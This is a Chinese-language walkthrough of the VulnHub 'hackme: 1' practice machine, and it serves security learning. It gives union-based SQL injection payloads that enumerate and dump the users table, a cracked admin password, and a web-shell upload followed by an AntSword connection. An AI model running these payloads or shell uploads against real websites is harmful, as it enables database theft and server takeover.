[hackme]靶机复现漏洞详解!!

靶场介绍:

靶机下载地址:

hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/

 

      首先虚拟机建一个hackme靶机   切换nat模式   然后kali扫描自己全端口

              nmap -sV ip段 0/24            扫描出ip进行访问

            发现是个登录页面可以注册先注册然后登录 

            发现是搜索框,我们直接用搜索型的sql注入

                  判断用什么注入

                经过实验 得出 我们可以使用 booktitle下的名字加’ and 1=1#

                也就是说 使用 CISSP Guide' and 1=1#

             CISSP Guide' and 1=2#

                      使用union联合注入 查看数据库名字

       CISSP Guide' union select 1,2,database() #

             得出数据库名,查看数据库下的表名,可以通过group_concat()函数拼接显示所有表名:

CISSP Guide' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='webapphacking' #  

                       查看users表下的字段          

CISSP Guide' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' #

               获取字段下的数据

CISSP Guide' union select user,name,pasword from users #

             经过尝试为 superadmin           2386acb2cf356944177746fc92523983 SGD

                       确定为这个账号               将密码md5解密

                        解密出密码为 Uncrackable 然后去登录 

                     发现可以上传图片            我们就可以尝试一下上传木马

                   已上传至uploads文件夹里 访问一下 

                     访问成功,使用蚁剑连接一下 

                  添加获得查看信息 

 

 

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值